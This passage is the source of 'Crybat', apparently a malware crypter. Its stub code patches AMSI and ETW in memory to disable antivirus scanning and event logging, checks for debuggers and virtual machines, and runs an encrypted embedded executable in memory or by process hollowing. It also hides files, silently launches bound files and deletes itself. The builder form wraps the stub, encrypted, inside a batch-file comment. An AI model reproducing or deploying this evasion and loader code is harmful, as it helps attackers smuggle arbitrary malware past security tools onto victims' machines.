70 | string amsiscanbuffer_str = Convert.ToBase64String(Encrypt(mode, Encoding.UTF8.GetBytes("AmsiScanBuffer"), key, iv));
71 | string etweventwrite_str = Convert.ToBase64String(Encrypt(mode, Encoding.UTF8.GetBytes("EtwEventWrite"), key, iv));
72 |
73 | string checkremotedebugger_str = Convert.ToBase64String(Encrypt(mode, Encoding.UTF8.GetBytes("CheckRemoteDebuggerPresent"), key, iv));
74 | string isdebuggerpresent_str = Convert.ToBase64String(Encrypt(mode, Encoding.UTF8.GetBytes("IsDebuggerPresent"), key, iv));
75 | string payloadtxt_str = Convert.ToBase64String(Encrypt(mode, Encoding.UTF8.GetBytes("payload.exe"), key, iv));
76 | string runpedlltxt_str = Convert.ToBase64String(Encrypt(mode, Encoding.UTF8.GetBytes("runpe.dll"), key, iv));
77 | string runpeclass_str = Convert.ToBase64String(Encrypt(mode, Encoding.UTF8.GetBytes("runpe.RunPE"), key, iv));
78 | string runpefunction_str = Convert.ToBase64String(Encrypt(mode, Encoding.UTF8.GetBytes("ExecutePE"), key, iv));
79 | string cmdcommand_str = Convert.ToBase64String(Encrypt(mode, Encoding.UTF8.GetBytes("/c choice /c y /n /d y /t 1 & attrib -h -s \""), key, iv));
80 | string key_str = Convert.ToBase64String(key);
81 | string iv_str = Convert.ToBase64String(iv);
82 |
83 | string stub = string.Empty;
84 | string stubcode = GetEmbeddedString("Crybat.Resources.Stub.cs");
85 |
86 | if (antidebug) stub += "#define ANTI_DEBUG\n";
87 | if (antivm) stub += "#define ANTI_VM\n";
88 | if (native) stub += "#define USE_RUNPE\n";
89 | if (mode == EncryptionMode.XOR) stub += "#define XOR_ENCRYPT\n";
90 | else stub += "#define AES_ENCRYPT\n";
91 | stubcode = stubcode.Replace("namespace_name", namespacename);
92 | stubcode = stubcode.Replace("class_name", classname);
93 | stubcode = stubcode.Replace("aesfunction_name", aesfunction);
94 | stubcode = stubcode.Replace("uncompressfunction_name", uncompressfunction);
95 | stubcode = stubcode.Replace("getembeddedresourcefunction_name", gerfunction);
96 | stubcode = stubcode.Replace("virtualprotect_name", virtualprotect);
97 | stubcode = stubcode.Replace("checkremotedebugger_name", checkremotedebugger);
98 | stubcode = stubcode.Replace("isdebuggerpresent_name", isdebuggerpresent);
99 | stubcode = stubcode.Replace("amsiscanbuffer_str", amsiscanbuffer_str);
100 | stubcode = stubcode.Replace("etweventwrite_str", etweventwrite_str);
101 | stubcode = stubcode.Replace("checkremotedebugger_str", checkremotedebugger_str);
102 | stubcode = stubcode.Replace("isdebuggerpresent_str", isdebuggerpresent_str);
103 | stubcode = stubcode.Replace("payloadtxt_str", payloadtxt_str);
104 | stubcode = stubcode.Replace("runpedlltxt_str", runpedlltxt_str);
105 | stubcode = stubcode.Replace("runpeclass_str", runpeclass_str);
106 | stubcode = stubcode.Replace("runpefunction_str", runpefunction_str);
107 | stubcode = stubcode.Replace("cmdcommand_str", cmdcommand_str);
108 | stubcode = stubcode.Replace("key_str", key_str);
109 | stubcode = stubcode.Replace("iv_str", iv_str);
110 | stub += stubcode;
111 |
112 | return stub;
113 | }
114 | }
115 | }
--------------------------------------------------------------------------------
/Crybat/FodyWeavers.xsd:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 | A list of assembly names to exclude from the default action of "embed all Copy Local references", delimited with line breaks
13 |
14 |
15 |
16 |
17 | A list of assembly names to include from the default action of "embed all Copy Local references", delimited with line breaks.
18 |
19 |
20 |
21 |
22 | A list of runtime assembly names to exclude from the default action of "embed all Copy Local references", delimited with line breaks
23 |
24 |
25 |
26 |
27 | A list of runtime assembly names to include from the default action of "embed all Copy Local references", delimited with line breaks.
28 |
29 |
30 |
31 |
32 | A list of unmanaged 32 bit assembly names to include, delimited with line breaks.
33 |
34 |
35 |
36 |
37 | A list of unmanaged 64 bit assembly names to include, delimited with line breaks.
38 |
39 |
40 |
41 |
42 | The order of preloaded assemblies, delimited with line breaks.
43 |
44 |
45 |
46 |
47 |
48 | This will copy embedded files to disk before loading them into memory. This is helpful for some scenarios that expected an assembly to be loaded from a physical file.
49 |
50 |
51 |
52 |
53 | Controls if .pdbs for reference assemblies are also embedded.
54 |
55 |
56 |
57 |
58 | Controls if runtime assemblies are also embedded.
59 |
60 |
61 |
62 |
63 | Controls whether the runtime assemblies are embedded with their full path or only with their assembly name.
64 |
65 |
66 |
67 |
68 | Embedded assemblies are compressed by default, and uncompressed when they are loaded. You can turn compression off with this option.
69 |
70 |
71 |
72 |
73 | As part of Costura, embedded assemblies are no longer included as part of the build. This cleanup can be turned off.
74 |
75 |
76 |
77 |
78 | Costura by default will load as part of the module initialization. This flag disables that behavior. Make sure you call CosturaUtility.Initialize() somewhere in your code.
79 |
80 |
81 |
82 |
83 | Costura will by default use assemblies with a name like 'resources.dll' as a satellite resource and prepend the output path. This flag disables that behavior.
84 |
85 |
86 |
87 |
88 | A list of assembly names to exclude from the default action of "embed all Copy Local references", delimited with |
89 |
90 |
91 |
92 |
93 | A list of assembly names to include from the default action of "embed all Copy Local references", delimited with |.
94 |
95 |
96 |
97 |
98 | A list of runtime assembly names to exclude from the default action of "embed all Copy Local references", delimited with |
99 |
100 |
101 |
102 |
103 | A list of runtime assembly names to include from the default action of "embed all Copy Local references", delimited with |.
104 |
105 |
106 |
107 |
108 | A list of unmanaged 32 bit assembly names to include, delimited with |.
109 |
110 |
111 |
112 |
113 | A list of unmanaged 64 bit assembly names to include, delimited with |.
114 |
115 |
116 |
117 |
118 | The order of preloaded assemblies, delimited with |.
119 |
120 |
121 |
122 |
123 |
124 |
125 |
126 | 'true' to run assembly verification (PEVerify) on the target assembly after all weavers have been executed.
127 |
128 |
129 |
130 |
131 | A comma-separated list of error codes that can be safely ignored in assembly verification.
132 |
133 |
134 |
135 |
136 | 'false' to turn off automatic generation of the XML Schema file.
137 |
138 |
139 |
140 |
141 |
--------------------------------------------------------------------------------
/Crybat/Resources/Stub.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Diagnostics;
3 | using System.IO;
4 | using System.IO.Compression;
5 | using System.Text;
6 | using System.Reflection;
7 | using System.Runtime.InteropServices;
8 | using System.Security.Cryptography;
9 | using System.Security.Principal;
10 | using System.Management;
11 | using System.Threading;
12 | using Microsoft.Win32;
13 |
14 | namespace namespace_name
15 | {
16 | internal class class_name
17 | {
18 | [DllImport("kernel32.dll")]
19 | static extern IntPtr LoadLibrary(string lpFileName);
20 |
21 | [DllImport("kernel32.dll")]
22 | static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
23 |
24 | delegate bool virtualprotect_name(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
25 | #if ANTI_DEBUG
26 | delegate bool checkremotedebugger_name(IntPtr hProcess, ref bool isDebuggerPresent);
27 | delegate bool isdebuggerpresent_name();
28 | #endif
29 |
30 | static void Main(string[] args)
31 | {
32 | string currentfilename = Process.GetCurrentProcess().MainModule.FileName;
33 | File.SetAttributes(currentfilename, FileAttributes.Hidden | FileAttributes.System);
34 | #if ANTI_VM
35 | ManagementObjectSearcher searcher = new ManagementObjectSearcher("Select * from Win32_ComputerSystem");
36 | ManagementObjectCollection instances = searcher.Get();
37 | foreach (ManagementBaseObject inst in instances)
38 | {
39 | string manufacturer = inst["Manufacturer"].ToString().ToLower();
40 | if ((manufacturer == "microsoft corporation" && inst["Model"].ToString().ToUpperInvariant().Contains("VIRTUAL")) || manufacturer.Contains("vmware") || inst["Model"].ToString() == "VirtualBox")
41 | {
42 | Environment.Exit(1);
43 | }
44 | }
45 | searcher.Dispose();
46 | #endif
47 |
48 | IntPtr kmodule = LoadLibrary("k" + "e" + "r" + "n" + "e" + "l" + "3" + "2" + "." + "d" + "l" + "l");
49 |
50 | #if ANTI_DEBUG
51 | IntPtr crdpaddr = GetProcAddress(kmodule, Encoding.UTF8.GetString(aesfunction_name(Convert.FromBase64String("checkremotedebugger_str"), Convert.FromBase64String("key_str"), Convert.FromBase64String("iv_str"))));
52 | IntPtr idpaddr = GetProcAddress(kmodule, Encoding.UTF8.GetString(aesfunction_name(Convert.FromBase64String("isdebuggerpresent_str"), Convert.FromBase64String("key_str"), Convert.FromBase64String("iv_str"))));
53 | checkremotedebugger_name CheckRemoteDebuggerPresent = (checkremotedebugger_name)Marshal.GetDelegateForFunctionPointer(crdpaddr, typeof(checkremotedebugger_name));
54 | isdebuggerpresent_name IsDebuggerPresent = (isdebuggerpresent_name)Marshal.GetDelegateForFunctionPointer(idpaddr, typeof(isdebuggerpresent_name));
55 | bool remotedebug = false;
56 | CheckRemoteDebuggerPresent(Process.GetCurrentProcess().Handle, ref remotedebug);
57 | if (Debugger.IsAttached || remotedebug || IsDebuggerPresent()) Environment.Exit(1);
58 | #endif
59 |
60 | IntPtr vpaddr = GetProcAddress(kmodule, "V" + "i" + "r" + "t" + "u" + "a" + "l" + "P" + "r" + "o" + "t" + "e" + "c" + "t");
61 | virtualprotect_name VirtualProtect = (virtualprotect_name)Marshal.GetDelegateForFunctionPointer(vpaddr, typeof(virtualprotect_name));
62 | byte[] patch;
63 | uint old;
64 |
65 | IntPtr amsimodule = LoadLibrary("a" + "m" + "s" + "i" + "." + "d" + "l" + "l");
66 | IntPtr asbaddr = GetProcAddress(amsimodule, Encoding.UTF8.GetString(aesfunction_name(Convert.FromBase64String("amsiscanbuffer_str"), Convert.FromBase64String("key_str"), Convert.FromBase64String("iv_str"))));
67 | if (IntPtr.Size == 8) patch = new byte[] { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 };
68 | else patch = new byte[] { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC2, 0x18, 0x00 };
69 | VirtualProtect(asbaddr, (UIntPtr)patch.Length, 0x40, out old);
70 | Marshal.Copy(patch, 0, asbaddr, patch.Length);
71 | VirtualProtect(asbaddr, (UIntPtr)patch.Length, old, out old);
72 |
73 | IntPtr ntdll = LoadLibrary("n" + "t" + "d" + "l" + "l" + "." + "d" + "l" + "l");
74 | IntPtr etwaddr = GetProcAddress(ntdll, Encoding.UTF8.GetString(aesfunction_name(Convert.FromBase64String("etweventwrite_str"), Convert.FromBase64String("key_str"), Convert.FromBase64String("iv_str"))));
75 | if (IntPtr.Size == 8) patch = new byte[] { 0xC3 };
76 | else patch = new byte[] { 0xC2, 0x14, 0x00 };
77 | VirtualProtect(etwaddr, (UIntPtr)patch.Length, 0x40, out old);
78 | Marshal.Copy(patch, 0, etwaddr, patch.Length);
79 | VirtualProtect(etwaddr, (UIntPtr)patch.Length, old, out old);
80 |
81 | string payloadstr = Encoding.UTF8.GetString(aesfunction_name(Convert.FromBase64String("payloadtxt_str"), Convert.FromBase64String("key_str"), Convert.FromBase64String("iv_str")));
82 | string runpestr = Encoding.UTF8.GetString(aesfunction_name(Convert.FromBase64String("runpedlltxt_str"), Convert.FromBase64String("key_str"), Convert.FromBase64String("iv_str")));
83 |
84 | Assembly asm = Assembly.GetExecutingAssembly();
85 | foreach (string name in asm.GetManifestResourceNames())
86 | {
87 | if (name == payloadstr || name == runpestr) continue;
88 | File.WriteAllBytes(name, getembeddedresourcefunction_name(name));
89 | File.SetAttributes(name, FileAttributes.Hidden | FileAttributes.System);
90 | new Thread(() =>
91 | {
92 | Process.Start(name).WaitForExit();
93 | File.SetAttributes(name, FileAttributes.Normal);
94 | File.Delete(name);
95 | }).Start();
96 | }
97 |
98 | byte[] payload = uncompressfunction_name(aesfunction_name(getembeddedresourcefunction_name(payloadstr), Convert.FromBase64String("key_str"), Convert.FromBase64String("iv_str")));
99 | string[] targs = new string[] { };
100 | try
101 | {
102 | targs = args[0].Split(' ');
103 | }
104 | catch { }
105 |
106 | #if USE_RUNPE
107 | Assembly runpe = Assembly.Load(uncompressfunction_name(aesfunction_name(getembeddedresourcefunction_name(runpestr), Convert.FromBase64String("key_str"), Convert.FromBase64String("iv_str"))));
108 | string runpeclass = Encoding.UTF8.GetString(aesfunction_name(Convert.FromBase64String("runpeclass_str"), Convert.FromBase64String("key_str"), Convert.FromBase64String("iv_str")));
109 | string runpefunction = Encoding.UTF8.GetString(aesfunction_name(Convert.FromBase64String("runpefunction_str"), Convert.FromBase64String("key_str"), Convert.FromBase64String("iv_str")));
110 | runpe.GetType(runpeclass).GetMethod(runpefunction).Invoke(null, new object[]
111 | {
112 | Path.ChangeExtension(currentfilename, null),
113 | payload,
114 | targs
115 | });
116 | #else
117 | MethodInfo entry = Assembly.Load(payload).EntryPoint;
118 | try { entry.Invoke(null, new object[] { targs }); }
119 | catch { entry.Invoke(null, null); }
120 | #endif
121 | string cmdstr = Encoding.UTF8.GetString(aesfunction_name(Convert.FromBase64String("cmdcommand_str"), Convert.FromBase64String("key_str"), Convert.FromBase64String("iv_str")));
122 | Process.Start(new ProcessStartInfo()
123 | {
124 | Arguments = cmdstr + currentfilename + "\" & del \"" + currentfilename + "\"",
125 | WindowStyle = ProcessWindowStyle.Hidden,
126 | CreateNoWindow = true,
127 | FileName = "cmd.exe"
128 | });
129 | }
130 |
131 | static byte[] aesfunction_name(byte[] input, byte[] key, byte[] iv)
132 | {
133 | #if AES_ENCRYPT
134 | AesManaged aes = new AesManaged();
135 | aes.Mode = CipherMode.CBC;
136 | aes.Padding = PaddingMode.PKCS7;
137 | ICryptoTransform decryptor = aes.CreateDecryptor(key, iv);
138 | byte[] decrypted = decryptor.TransformFinalBlock(input, 0, input.Length);
139 | decryptor.Dispose();
140 | aes.Dispose();
141 | return decrypted;
142 | #endif
143 | #if XOR_ENCRYPT
144 | for (int i = 0; i < input.Length; i++)
145 | {
146 | input[i] = (byte)(input[i] ^ key[i % key.Length]);
147 | }
148 | return input;
149 | #endif
150 | }
151 |
152 | static byte[] uncompressfunction_name(byte[] bytes)
153 | {
154 | MemoryStream msi = new MemoryStream(bytes);
155 | MemoryStream mso = new MemoryStream();
156 | GZipStream gs = new GZipStream(msi, CompressionMode.Decompress);
157 | gs.CopyTo(mso);
158 | gs.Dispose();
159 | mso.Dispose();
160 | msi.Dispose();
161 | return mso.ToArray();
162 | }
163 |
164 | static byte[] getembeddedresourcefunction_name(string name)
165 | {
166 | Assembly asm = Assembly.GetExecutingAssembly();
167 | MemoryStream ms = new MemoryStream();
168 | Stream stream = asm.GetManifestResourceStream(name);
169 | stream.CopyTo(ms);
170 | stream.Dispose();
171 | byte[] ret = ms.ToArray();
172 | ms.Dispose();
173 | return ret;
174 | }
175 | }
176 | }
--------------------------------------------------------------------------------
/Crybat/Form1.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.CodeDom.Compiler;
3 | using System.Collections.Generic;
4 | using System.Diagnostics;
5 | using System.IO;
6 | using System.Net;
7 | using System.Security.Cryptography;
8 | using System.Text;
9 | using System.Threading.Tasks;
10 | using System.Windows.Forms;
11 | using Microsoft.CSharp;
12 |
13 | using static Crybat.Utils;
14 |
15 | namespace Crybat
16 | {
17 | public partial class Form1 : Form
18 | {
19 | public Form1()
20 | {
21 | InitializeComponent();
22 | }
23 |
24 | // Event handlers
25 | private void Form1_Load(object sender, EventArgs e)
26 | {
27 | SettingsObject obj = Settings.Load();
28 | if (obj != null) UnpackSettings(obj);
29 | Task.Factory.StartNew(CheckVersion);
30 | UpdateKeys(sender, e);
31 | }
32 |
33 | private void Form1_FormClosing(object sender, FormClosingEventArgs e)
34 | {
35 | Settings.Save(PackSettings());
36 | Environment.Exit(0);
37 | }
38 |
39 | private void openButton_Click(object sender, EventArgs e)
40 | {
41 | OpenFileDialog ofd = new OpenFileDialog();
42 | ofd.RestoreDirectory = true;
43 | if (ofd.ShowDialog() != DialogResult.OK) return;
44 | textBox1.Text = ofd.FileName;
45 | }
46 |
47 | private void buildButton_Click(object sender, EventArgs e) => Crypt();
48 |
49 | private void aesEncryption_CheckedChanged(object sender, EventArgs e)
50 | {
51 | if (aesEncryption.Checked) xorEncryption.Checked = false;
52 | }
53 |
54 | private void xorEncryption_CheckedChanged(object sender, EventArgs e)
55 | {
56 | if (xorEncryption.Checked) aesEncryption.Checked = false;
57 | }
58 |
59 | private void addFile_Click(object sender, EventArgs e)
60 | {
61 | OpenFileDialog ofd = new OpenFileDialog();
62 | ofd.RestoreDirectory = true;
63 | if (ofd.ShowDialog() != DialogResult.OK) return;
64 | listBox1.Items.Add(ofd.FileName);
65 | }
66 |
67 | private void removeFile_Click(object sender, EventArgs e)
68 | {
69 | listBox1.Items.Remove(listBox1.SelectedItem);
70 | }
71 |
72 | // Functions
73 | private void Crypt()
74 | {
75 | buildButton.Enabled = false;
76 | tabControl1.SelectedTab = tabControl1.TabPages["outputPage"];
77 | listBox2.Items.Clear();
78 |
79 | Random rng = new Random();
80 | string _input = textBox1.Text;
81 | byte[] _key = Convert.FromBase64String(key1.Text);
82 | byte[] _iv = Convert.FromBase64String(iv1.Text);
83 | byte[] _stubkey = Convert.FromBase64String(key2.Text);
84 | byte[] _stubiv = Convert.FromBase64String(iv6.Text);
85 | EncryptionMode mode = xorEncryption.Checked ? EncryptionMode.XOR : EncryptionMode.AES;
86 |
87 | if (!File.Exists(_input))
88 | {
89 | MessageBox.Show("Invalid input path.", "Error", MessageBoxButtons.OK, MessageBoxIcon.Error);
90 | buildButton.Enabled = true;
91 | return;
92 | }
93 | if (Path.GetExtension(_input) != ".exe")
94 | {
95 | MessageBox.Show("Invalid input file.", "Error", MessageBoxButtons.OK, MessageBoxIcon.Error);
96 | buildButton.Enabled = true;
97 | return;
98 | }
99 |
100 | Console.ForegroundColor = ConsoleColor.Gray;
101 | byte[] pbytes = File.ReadAllBytes(_input);
102 | bool isnetasm = IsAssembly(_input);
103 |
104 | if (isnetasm)
105 | {
106 | listBox2.Items.Add("Patching assembly...");
107 | pbytes = Patcher.Fix(pbytes);
108 | }
109 |
110 | listBox2.Items.Add("Encrypting payload...");
111 | byte[] payload_enc = Encrypt(mode, Compress(pbytes), _stubkey, _stubiv);
112 |
113 | listBox2.Items.Add("Creating stub...");
114 | string stub = StubGen.CreateCS(_stubkey, _stubiv, mode, antiDebug.Checked, antiVM.Checked, !isnetasm, rng);
115 |
116 | listBox2.Items.Add("Building stub...");
117 | string tempfile = Path.GetTempFileName();
118 | File.WriteAllBytes("payload.exe", payload_enc);
119 | if (!isnetasm)
120 | {
121 | byte[] runpedll_enc = Encrypt(mode, Compress(GetEmbeddedResource("Crybat.Resources.runpe.dll")), _stubkey, _stubiv);
122 | File.WriteAllBytes("runpe.dll", runpedll_enc);
123 | }
124 | CSharpCodeProvider csc = new CSharpCodeProvider();
125 | CompilerParameters parameters = new CompilerParameters(new[] { "mscorlib.dll", "System.Core.dll", "System.dll", "System.Management.dll" }, tempfile)
126 | {
127 | GenerateExecutable = true,
128 | CompilerOptions = "-optimize",
129 | IncludeDebugInformation = false
130 | };
131 | parameters.EmbeddedResources.Add("payload.exe");
132 | if (!isnetasm) parameters.EmbeddedResources.Add("runpe.dll");
133 | foreach (string item in listBox1.Items) parameters.EmbeddedResources.Add(item);
134 | CompilerResults results = csc.CompileAssemblyFromSource(parameters, stub);
135 | if (results.Errors.Count > 0)
136 | {
137 | File.Delete("payload.txt");
138 | if (!isnetasm) File.Delete("runpe.dll");
139 | File.Delete(tempfile);
140 | List errors = new List();
141 | foreach (CompilerError error in results.Errors) errors.Add(error.ToString());
142 | MessageBox.Show($"Stub build errors:{Environment.NewLine}{string.Join(Environment.NewLine, errors)}", "Error", MessageBoxButtons.OK, MessageBoxIcon.Error);
143 | buildButton.Enabled = true;
144 | return;
145 | }
146 | byte[] stubbytes = File.ReadAllBytes(tempfile);
147 | File.Delete("payload.exe");
148 | if (!isnetasm) File.Delete("runpe.dll");
149 | File.Delete(tempfile);
150 |
151 | listBox2.Items.Add("Encrypting stub...");
152 | byte[] stub_enc = Encrypt(mode, Compress(stubbytes), _key, _iv);
153 |
154 | listBox2.Items.Add("Creating batch file...");
155 | string content = FileGen.CreateBat(_key, _iv, mode, hidden.Checked, selfDelete.Checked, runas.Checked, rng);
156 | List content_lines = new List(content.Split(new string[] { Environment.NewLine }, StringSplitOptions.None));
157 | content_lines.Insert(rng.Next(0, content_lines.Count), ":: " + Convert.ToBase64String(stub_enc));
158 | content = string.Join(Environment.NewLine, content_lines);
159 |
160 | SaveFileDialog sfd = new SaveFileDialog()
161 | {
162 | AddExtension = true,
163 | DefaultExt = "bat",
164 | Title = "Save File",
165 | Filter = "Batch files (*.bat)|*.bat",
166 | RestoreDirectory = true,
167 | FileName = Path.ChangeExtension(_input, "bat")
168 | };
169 | sfd.ShowDialog();
170 |
171 | listBox2.Items.Add("Writing output...");
172 | File.WriteAllText(sfd.FileName, content, Encoding.ASCII);
173 |
174 | MessageBox.Show("Done!", "Success", MessageBoxButtons.OK, MessageBoxIcon.Information);
175 | buildButton.Enabled = true;
176 | }
177 |
178 | private void CheckVersion()
179 | {
180 | try
181 | {
182 | WebClient wc = new WebClient();
183 | string latestversion = wc.DownloadString("https://raw.githubusercontent.com/ch2sh/Crybat/main/version").Trim();
184 | wc.Dispose();
185 | if (File.Exists(AppDomain.CurrentDomain.BaseDirectory + "\\bin\\latestversion"))
186 | {
187 | string currentversion = File.ReadAllText(AppDomain.CurrentDomain.BaseDirectory + "\\bin\\latestversion").Trim();
188 | if (currentversion != latestversion)
189 | {
190 | DialogResult result = MessageBox.Show($"Crybat {currentversion} is outdated. Download {latestversion}?", "Warning", MessageBoxButtons.YesNoCancel, MessageBoxIcon.Exclamation);
191 | if (result == DialogResult.Yes)
192 | {
193 | Process.Start("https://github.com/ch2sh/Crybat/releases/tag/" + latestversion);
194 | }
195 | }
196 | }
197 | File.WriteAllText(AppDomain.CurrentDomain.BaseDirectory + "\\bin\\latestversion", latestversion);
198 | }
199 | catch { }
200 | }
201 |
202 | private void UpdateKeys(object sender, EventArgs e)
203 | {
204 | AesManaged aes = new AesManaged();
205 | key1.Text = Convert.ToBase64String(aes.Key);
206 | iv1.Text = Convert.ToBase64String(aes.IV);
207 | aes.Dispose();
208 | aes = new AesManaged();
209 | key2.Text = Convert.ToBase64String(aes.Key);
210 | iv6.Text = Convert.ToBase64String(aes.IV);
211 | aes.Dispose();
212 | }
213 |
214 | private void UnpackSettings(SettingsObject obj)
215 | {
216 | textBox1.Text = obj.inputFile;
217 | antiDebug.Checked = obj.antiDebug;
218 | antiVM.Checked = obj.antiVM;
219 | selfDelete.Checked = obj.selfDelete;
220 | hidden.Checked = obj.hidden;
221 | runas.Checked = obj.runas;
222 | aesEncryption.Checked = obj.aes;
223 | xorEncryption.Checked = obj.xor;
224 | listBox1.Items.AddRange(obj.bindedFiles);
225 | }
226 |
227 | private SettingsObject PackSettings()
228 | {
229 | SettingsObject obj = new SettingsObject()
230 | {
231 | inputFile = textBox1.Text,
232 | antiDebug = antiDebug.Checked,
233 | antiVM = antiVM.Checked,
234 | selfDelete = selfDelete.Checked,
235 | hidden = hidden.Checked,
236 | runas = runas.Checked,
237 | aes = aesEncryption.Checked,
238 | xor = xorEncryption.Checked
239 | };
240 | List paths = new List();
241 | foreach (string item in listBox1.Items) paths.Add(item);
242 | obj.bindedFiles = paths.ToArray();
243 | return obj;
244 | }
245 | }
246 | }
247 |
--------------------------------------------------------------------------------
/Crybat/Crybat.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 | Debug
7 | AnyCPU
8 | {D6BBA820-E9F7-4DA3-A7D2-90A73871C0DA}
9 | WinExe
10 | Crybat
11 | Crybat
12 | v4.8
13 | 512
14 | true
15 | true
16 |
17 |
18 |
19 |
20 | AnyCPU
21 | true
22 | full
23 | false
24 | bin\Debug\
25 | DEBUG;TRACE
26 | prompt
27 | 4
28 |
29 |
30 | AnyCPU
31 | none
32 | true
33 | bin\Release\
34 | TRACE
35 | prompt
36 | 4
37 |
38 |
39 |
40 | ..\packages\Costura.Fody.5.7.0\lib\netstandard1.0\Costura.dll
41 |
42 |
43 | ..\packages\dnlib.3.5.0\lib\net45\dnlib.dll
44 |
45 |
46 | ..\packages\Microsoft.Win32.Primitives.4.3.0\lib\net46\Microsoft.Win32.Primitives.dll
47 | True
48 | True
49 |
50 |
51 | ..\packages\Newtonsoft.Json.13.0.1\lib\net45\Newtonsoft.Json.dll
52 |
53 |
54 |
55 | ..\packages\System.AppContext.4.3.0\lib\net463\System.AppContext.dll
56 | True
57 | True
58 |
59 |
60 |
61 | ..\packages\System.Console.4.3.0\lib\net46\System.Console.dll
62 | True
63 | True
64 |
65 |
66 |
67 | ..\packages\System.Diagnostics.DiagnosticSource.4.3.0\lib\net46\System.Diagnostics.DiagnosticSource.dll
68 |
69 |
70 | ..\packages\System.Diagnostics.Tracing.4.3.0\lib\net462\System.Diagnostics.Tracing.dll
71 | True
72 | True
73 |
74 |
75 | ..\packages\System.Globalization.Calendars.4.3.0\lib\net46\System.Globalization.Calendars.dll
76 | True
77 | True
78 |
79 |
80 | ..\packages\System.IO.4.3.0\lib\net462\System.IO.dll
81 | True
82 | True
83 |
84 |
85 | ..\packages\System.IO.Compression.4.3.0\lib\net46\System.IO.Compression.dll
86 | True
87 | True
88 |
89 |
90 |
91 | ..\packages\System.IO.Compression.ZipFile.4.3.0\lib\net46\System.IO.Compression.ZipFile.dll
92 | True
93 | True
94 |
95 |
96 | ..\packages\System.IO.FileSystem.4.3.0\lib\net46\System.IO.FileSystem.dll
97 | True
98 | True
99 |
100 |
101 | ..\packages\System.IO.FileSystem.Primitives.4.3.0\lib\net46\System.IO.FileSystem.Primitives.dll
102 | True
103 | True
104 |
105 |
106 | ..\packages\System.Linq.4.3.0\lib\net463\System.Linq.dll
107 | True
108 | True
109 |
110 |
111 | ..\packages\System.Linq.Expressions.4.3.0\lib\net463\System.Linq.Expressions.dll
112 | True
113 | True
114 |
115 |
116 | ..\packages\System.Net.Http.4.3.0\lib\net46\System.Net.Http.dll
117 | True
118 | True
119 |
120 |
121 | ..\packages\System.Net.Sockets.4.3.0\lib\net46\System.Net.Sockets.dll
122 | True
123 | True
124 |
125 |
126 |
127 | ..\packages\System.Reflection.4.3.0\lib\net462\System.Reflection.dll
128 | True
129 | True
130 |
131 |
132 | ..\packages\System.Runtime.4.3.0\lib\net462\System.Runtime.dll
133 | True
134 | True
135 |
136 |
137 | ..\packages\System.Runtime.Extensions.4.3.0\lib\net462\System.Runtime.Extensions.dll
138 | True
139 | True
140 |
141 |
142 | ..\packages\System.Runtime.InteropServices.4.3.0\lib\net463\System.Runtime.InteropServices.dll
143 | True
144 | True
145 |
146 |
147 | ..\packages\System.Runtime.InteropServices.RuntimeInformation.4.3.0\lib\net45\System.Runtime.InteropServices.RuntimeInformation.dll
148 | True
149 | True
150 |
151 |
152 | ..\packages\System.Security.Cryptography.Algorithms.4.3.0\lib\net463\System.Security.Cryptography.Algorithms.dll
153 | True
154 | True
155 |
156 |
157 | ..\packages\System.Security.Cryptography.Encoding.4.3.0\lib\net46\System.Security.Cryptography.Encoding.dll
158 | True
159 | True
160 |
161 |
162 | ..\packages\System.Security.Cryptography.Primitives.4.3.0\lib\net46\System.Security.Cryptography.Primitives.dll
163 | True
164 | True
165 |
166 |
167 | ..\packages\System.Security.Cryptography.X509Certificates.4.3.0\lib\net461\System.Security.Cryptography.X509Certificates.dll
168 | True
169 | True
170 |
171 |
172 | ..\packages\System.Text.RegularExpressions.4.3.0\lib\net463\System.Text.RegularExpressions.dll
173 | True
174 | True
175 |
176 |
177 |
178 |
179 |
180 |
181 |
182 |
183 |
184 |
185 | ..\packages\System.Xml.ReaderWriter.4.3.0\lib\net46\System.Xml.ReaderWriter.dll
186 | True
187 | True
188 |
189 |
190 |
191 |
192 |
193 |
194 |
195 |
196 | Form
197 |
198 |
199 | Form1.cs
200 |
201 |
202 |
203 |
204 |
205 |
206 | Form1.cs
207 |
208 |
209 |
210 | ResXFileCodeGenerator
211 | Resources.Designer.cs
212 | Designer
213 |
214 |
215 | True
216 | Resources.resx
217 | True
218 |
219 |
220 |
221 | SettingsSingleFileGenerator
222 | Settings.Designer.cs
223 |
224 |
225 | True
226 | Settings.settings
227 | True
228 |
229 |
230 |
231 |
232 |
233 |
234 |
235 |
236 |
237 |
238 |
239 |
240 |
241 |
242 | This project references NuGet package(s) that are missing on this computer. Use NuGet Package Restore to download them. For more information, see http://go.microsoft.com/fwlink/?LinkID=322105. The missing file is {0}.
243 |
244 |
245 |
246 |
247 |
248 |
249 |
--------------------------------------------------------------------------------
/Crybat/Form1.Designer.cs:
--------------------------------------------------------------------------------
1 | namespace Crybat
2 | {
3 | partial class Form1
4 | {
5 | ///
6 | /// Required designer variable.
7 | ///
8 | private System.ComponentModel.IContainer components = null;
9 |
10 | ///
11 | /// Clean up any resources being used.
12 | ///
13 | /// true if managed resources should be disposed; otherwise, false.
14 | protected override void Dispose(bool disposing)
15 | {
16 | if (disposing && (components != null))
17 | {
18 | components.Dispose();
19 | }
20 | base.Dispose(disposing);
21 | }
22 |
23 | #region Windows Form Designer generated code
24 |
25 | ///
26 | /// Required method for Designer support - do not modify
27 | /// the contents of this method with the code editor.
28 | ///
29 | private void InitializeComponent()
30 | {
31 | this.label1 = new System.Windows.Forms.Label();
32 | this.textBox1 = new System.Windows.Forms.TextBox();
33 | this.openButton = new System.Windows.Forms.Button();
34 | this.antiDebug = new System.Windows.Forms.CheckBox();
35 | this.buildButton = new System.Windows.Forms.Button();
36 | this.selfDelete = new System.Windows.Forms.CheckBox();
37 | this.hidden = new System.Windows.Forms.CheckBox();
38 | this.antiVM = new System.Windows.Forms.CheckBox();
39 | this.tabControl1 = new System.Windows.Forms.TabControl();
40 | this.optionsPage = new System.Windows.Forms.TabPage();
41 | this.encryptionPage = new System.Windows.Forms.TabPage();
42 | this.refreshKeys = new System.Windows.Forms.Button();
